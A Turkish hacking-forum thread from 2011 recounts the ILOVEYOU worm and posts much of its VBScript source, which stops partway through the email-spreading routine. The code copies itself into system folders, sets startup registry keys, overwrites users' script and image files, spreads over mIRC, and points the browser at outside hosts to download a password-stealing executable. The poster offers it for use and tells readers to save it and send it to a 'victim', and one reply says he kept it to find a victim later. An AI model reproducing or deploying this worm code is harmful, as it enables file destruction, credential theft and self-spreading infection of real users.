İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

ÖLÜMCÜL ILoveYou Virüsü ve Kodları (MUTLAKA BAKIN)

19-02-2011 21:28
#1
Üyelik tarihi:
01/2011
Nereden:
Dünyadan
Mesajlar:
570
Teşekkür (Etti):
28
Teşekkür (Aldı):
168
Konular:
51
Ticaret:
(0) %
Evet arkadaşlar sizlere dünyanın en tehlikeli 10 virüsünden ILoveYou virüsü anlatacağım ve kullanmanız içinde kodlarını vereceğim.. (ARKADASLAR ÖNCELİKLE BELİRTEYİM PC YENİ TANIŞAN VE YA FAZLA BİLGİSİ OLMAYAN ARKADASLAR UZAK DURSUN YOKSA HİÇBİR MESULİYET KABUL ETMEM)

En zararlı bilgisayar virüslerinden olan ILOVEYOU, kendini kopyalama yeteneği olan solucan türü bir virüstü.

Etkisini gösterdiği dönemde 10 milyar dolara yakın zarara yol açan virüs, 2000 yılında Filipinler'den dünyaya yayıldı.



Gizli bir hayran

ILOVEYOU, e-posta yolu ile dağılıyordu. Kurbana gelen e-postanın konu bölümünde, "Gizli bir hayranından gelen aşk mektubu" ifadesi vardı.


E-postanın ekinde bulunan "LOVE-LETTER-FOR-YOU.TXT.vbs" dosyası çalıştırıldığı takdirde şunlar oluyordu:

  • Virüs, kurbanın sabit diskinde birkaç klasör yaratıyor ve kendini gizli dosya olarak kopyalıyordu.
  • Windows registry'e bazı eklemeler yapıyordu.
  • Kendini e-postalara kopyalayarak kurbanın adres defterindeki kişilere gönderiyordu.
  • İnternetten WIN-BUGSFIX.EXE adında bir dosya indiriyordu. Bu programla kurbanın şifrelerini çalmak ve e-postalarındaki gizli bilgilere ulaşmak mümkün oluyordu.
NOT: Virüsü oluşturan kişi yada kişilerin kim oldukları bulunamamıştır..

Şimdi size kodları vereceğim bu kodları yeni bir metin belgesine kopyalayarak ister .bat uzantılı istersede html uzantılı olarak kaydedip kurbana gönderebilirsiniz.. (LÜTFEN MASUM İNSANLARDA DENEMEYİNİZ!)

VE İŞTE KODLAR


rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur r entVersion\Run\MSKernel32",dirsystem&"\MSKernel32. vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur r entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL .vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy 7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur r entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&""&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB"&a)
if (regv="") then
regv=1
end if__________________


Tekrar söylüyorum bilmeyen lütfen uzak dursunlar bilgisayarınızın çok kötü bir şekilde çökmesini istemiyorsanız lütfen uzak durun!

Bu Arada bi teşekkürüde çok görmeyin
Kullanıcı İmzası
GEÇMİŞİNİ UNUTAN GELECEĞİNİ GÖREMEZ!!!

19-02-2011 21:43
#2
Zican4594 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2007
Nereden:
BURSA
Mesajlar:
36
Teşekkür (Etti):
9
Teşekkür (Aldı):
1
Konular:
6
Ticaret:
(0) %
teşekkürettim
Kullanıcı İmzası
Güneş Her Sabah Senle Dogar.
Rengin Hemen Ruhumu Sarar.
Gelsin Şampiyonluk Yeniden.
Taraftarin Aşkına Saldır Yeşil Timsahlar...

ADI AŞK BU EZİYETİN

2009-2010 TSL CHAMPİONS BURSASPOR!
ADAM GİBİ ADAM ERTUĞRUL SAĞLAM

Bu Aşk Leylayla Mecnunu Kıskandırır...
19-02-2011 21:50
#3
Üyelik tarihi:
01/2011
Nereden:
Dünyadan
Mesajlar:
570
Teşekkür (Etti):
28
Teşekkür (Aldı):
168
Konular:
51
Ticaret:
(0) %
Alıntı:
Zican4594´isimli üyeden Alıntı Mesajı göster
teşekkürettim
önemli değil kardeşim
Kullanıcı İmzası
GEÇMİŞİNİ UNUTAN GELECEĞİNİ GÖREMEZ!!!
19-02-2011 22:32
#4
Üyelik tarihi:
06/2010
Mesajlar:
392
Teşekkür (Etti):
66
Teşekkür (Aldı):
35
Konular:
22
Ticaret:
(0) %
Saol....
Kullanıcı İmzası

19-02-2011 23:10
#5
Üyelik tarihi:
01/2011
Nereden:
Dünyadan
Mesajlar:
570
Teşekkür (Etti):
28
Teşekkür (Aldı):
168
Konular:
51
Ticaret:
(0) %
önemli değil
Kullanıcı İmzası
GEÇMİŞİNİ UNUTAN GELECEĞİNİ GÖREMEZ!!!
25-02-2011 19:41
#6
Üyelik tarihi:
02/2011
Mesajlar:
4
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
1
Ticaret:
(0) %
çalısıyosa geercekten cok etkileyicii
Kullanıcı İmzası
Bir $éy ßiLiyorSan Söylé FaydaLansınLar
ßir$éy ßilmiyorsan SUS ki Adam sansınLar !
27-02-2011 23:18
#7
pjx - ait Kullanıcı Resmi (Avatar)
pjx
Üye
Üyelik tarihi:
02/2011
Mesajlar:
164
Teşekkür (Etti):
8
Teşekkür (Aldı):
7
Konular:
29
Ticaret:
(0) %
teşekkürler.aldım kaydettim belki daha sonra bi kurban bulurum.
Kullanıcı İmzası
veni vidi vici...acta est fabula...:inv
28-02-2011 13:57
#8
mertna - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2008
Nereden:
127.0.0.1
Mesajlar:
1.003
Teşekkür (Etti):
137
Teşekkür (Aldı):
103
Konular:
67
Ticaret:
(0) %
anti-virüsler görüyor yani işe yaramaz.
Kullanıcı İmzası

28-02-2011 17:10
#9
smeagol343 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2010
Mesajlar:
678
Teşekkür (Etti):
43
Teşekkür (Aldı):
73
Konular:
123
Ticaret:
(0) %
Sanal pc de denersek ne olur ?
Kullanıcı İmzası
Dünya dönüyor. Sen de Ayak uydur Dünya ya DÖN, her fırsatta dansöz gibi kıvıra kıvıra. YA DA DELİKANLI OL DAR ETSİNLER DÜNYAYI SANA ! hey gidi kahpe dünya hey! sen zaten delikanlı olsaydın, yuvarlak olmazdın en başta !!
01-03-2011 19:16
#10
darkboy03 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2009
Nereden:
Koltuk
Mesajlar:
85
Teşekkür (Etti):
5
Teşekkür (Aldı):
3
Konular:
1
Ticaret:
(0) %
Alıntı:
smeagol343´isimli üyeden Alıntı Mesajı göster
Sanal pc de denersek ne olur ?
yukarıda verilenler olur Ha kurbanda denemişin ha sanal pc de..
Kullanıcı İmzası

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı